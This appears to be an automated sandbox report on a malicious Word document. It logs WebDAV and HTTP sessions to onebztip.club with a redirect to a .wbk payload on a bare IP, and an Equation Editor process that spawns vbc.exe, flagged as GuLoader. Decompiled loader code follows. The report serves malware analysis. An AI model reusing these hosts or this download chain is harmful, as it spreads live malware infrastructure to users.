2022-01-28 10:26:13 UTC	11	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 content-type: text/html; charset=UTF-8 content-length: 10885 date: Fri, 28 Jan 2022 10:26:13 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2022-01-28 10:26:13 UTC	11	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link type="text

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-01-28 10:26:15 UTC	22	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 6e 65 62 7a 74 69 70 2e 63 6c 75 62 0d 0a 0d 0a Data Ascii: PROPFIND /index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: onebztip.club
2022-01-28 10:26:15 UTC	22	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 content-type: text/html; charset=UTF-8 content-length: 10885 date: Fri, 28 Jan 2022 10:26:15 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2022-01-28 10:26:15 UTC	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link type="text

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-01-28 10:26:18 UTC	33	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 6e 65 62 7a 74 69 70 2e 63 6c 75 62 0d 0a 0d 0a Data Ascii: PROPFIND /index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: onebztip.club
2022-01-28 10:26:18 UTC	33	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 content-type: text/html; charset=UTF-8 transfer-encoding: chunked date: Fri, 28 Jan 2022 10:26:18 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2022-01-28 10:26:18 UTC	33	IN	Data Raw: 32 41 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 Data Ascii: 2A85<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link type
2022-01-28 10:26:18 UTC	44	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-01-28 10:26:18 UTC	44	OUT	GET /index.php/x HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: onebztip.club Connection: Keep-Alive
2022-01-28 10:26:19 UTC	44	IN	HTTP/1.1 302 Found keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 location: http://107.172.93.32/invoice/dhl_shp.wbk content-type: text/html; charset=UTF-8 content-length: 0 date: Fri, 28 Jan 2022 10:26:19 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 x-turbo-charged-by: LiteSpeed connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49174	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-01-28 10:26:20 UTC	45	OUT	HEAD /index.php/x HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: onebztip.club Content-Length: 0 Connection: Keep-Alive
2022-01-28 10:26:20 UTC	45	IN	HTTP/1.1 302 Found keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 location: http://107.172.93.32/invoice/dhl_shp.wbk content-type: text/html; charset=UTF-8 date: Fri, 28 Jan 2022 10:26:20 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 x-turbo-charged-by: LiteSpeed connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49176	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-01-28 10:26:26 UTC	45	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 6e 65 62 7a 74 69 70 2e 63 6c 75 62 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: onebztip.club
2022-01-28 10:26:26 UTC	45	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 content-type: text/html; charset=UTF-8 content-length: 10885 date: Fri, 28 Jan 2022 10:26:26 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2022-01-28 10:26:26 UTC	46	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link type="text

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49177	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-01-28 10:26:28 UTC	56	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 6e 65 62 7a 74 69 70 2e 63 6c 75 62 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: onebztip.club
2022-01-28 10:26:28 UTC	56	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 content-type: text/html; charset=UTF-8 content-length: 10885 date: Fri, 28 Jan 2022 10:26:28 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2022-01-28 10:26:28 UTC	57	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link type="text

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXEPID: 1124, Parent PID: 596

General

Target ID:	0
Start time:	11:25:16
Start date:	28/01/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f0b0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 3004, Parent PID: 596

General

Target ID:	7
Start time:	11:25:37
Start date:	28/01/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 2516, Parent PID: 3004

General

Target ID:	9
Start time:	11:25:40
Start date:	28/01/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0x400000
File size:	166200 bytes
MD5 hash:	38034F18AF511C3B04B25170735E8B8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: vbc.exePID: 2516, Parent PID: 3004COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	21%
Signature Coverage:	19.1%
Total number of Nodes:	1990
Total number of Limit Nodes:	33

Executed Functions

Function 0040352D Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				signed int _t234;
				WCHAR* _t235;

				0x440000 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				E0040653D(0x440000, GetCommandLineW());
				_t94 = 0x440000;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				if( *0x440000 == _t234) {
					_t94 = 0x440002;
				}
				_t199 = CharNextW(E00405E39(_t94, 0x440000));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(0x440800, _t199);
										L37:
										_t235 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(0x440000, _t189);
											if(_t219 < 0x440000) {
												L48:
												_t264 = _t219 - 0x440000;
												_v8 = L"Error launching installer";
												if(_t219 < 0x440000) {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x441800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags =  *0x440800;
														if( *0x440800 == 0) {
															E0040653D(0x440800, 0x441800);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(0x443800, 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(0x440800, _t222);
												E0040653D(0x441000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= 0x440000) {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040353b
0x0040353c
0x00403543
0x00403546
0x0040354d
0x00403550
0x00403563
0x00403569
0x0040356c
0x0040356f
0x0040357d
0x00403585
0x00403590
0x004035a9
0x004035ab
0x004035b3
0x004035b3
0x004035be
0x004035c0
0x004035c0
0x004035d5
0x004035fa
0x00403608
0x0040360b
0x00403612
0x00403619
0x00403619
0x00403612
0x0040361b
0x00403620
0x00403621
0x0040362d
0x00403631
0x00403638
0x00403646
0x0040364b
0x00403652
0x00403656
0x0040365a
0x0040365c
0x0040365c
0x0040365a
0x00403663
0x0040366a
0x00403670
0x00403688
0x00403698
0x004036aa
0x004036b1
0x004036b3
0x004036b4
0x004036c5
0x004036c9
0x004036c9
0x004036dc
0x004036de
0x004037d8
0x004037d8
0x004037db
0x004037de
0x00000000
0x00000000
0x004036e8
0x004036e9
0x004036ec
0x004036f5
0x004036f5
0x004036f8
0x004036fb
0x004036fe
0x00403701
0x00403701
0x00403701
0x00403702
0x00403706
0x004037c6
0x004037cf
0x004037d1
0x004037d4
0x004037d7
0x004037d7
0x004037d7
0x00000000
0x0040370c
0x0040370d
0x0040370e
0x00403712
0x0040372c
0x00403733
0x00403746
0x00403747
0x0040375c
0x00403761
0x00403763
0x00403765
0x00403781
